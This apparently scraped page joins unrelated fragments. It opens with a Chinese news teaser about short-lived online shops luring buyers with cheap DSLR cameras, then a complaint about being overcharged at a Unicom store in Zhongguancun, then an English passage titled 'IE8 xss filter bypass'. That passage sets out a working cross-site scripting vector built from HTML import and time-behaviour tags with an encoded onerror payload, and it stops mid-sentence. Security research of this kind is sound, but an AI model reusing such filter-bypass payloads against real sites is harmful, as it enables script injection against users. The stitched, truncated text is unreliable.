[阅读时间] 钱不该买什么



聚焦热点 理性透视 记者发现一批数码网店速开速关 专用低价引消费者上当 市场价2万元左右的数码单反相机,在网店上居然只需要不到一半的价钱就可以买到?


前些天去北京中关村被一家联通营业厅的店员给合伙坑了76块大洋,由于当时时间紧加之是字外地没有兄弟,所以只有认栽了。 是那种之前说好买裸机,交了

IE8 xss filter bypass

Note: IE 10 have fixed this issue,and IE8 ... ------------------------------------------------- 1. a <?import ... > tag can also be written as a <import ...> tag. <html> <body> <div> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;"> </div> </body> </html> the code above will execute script fragment in "to" attribute. Furthermore, we found this xss vector contructed from the three tags (<xml> <import> & <t:set ...>) can bypass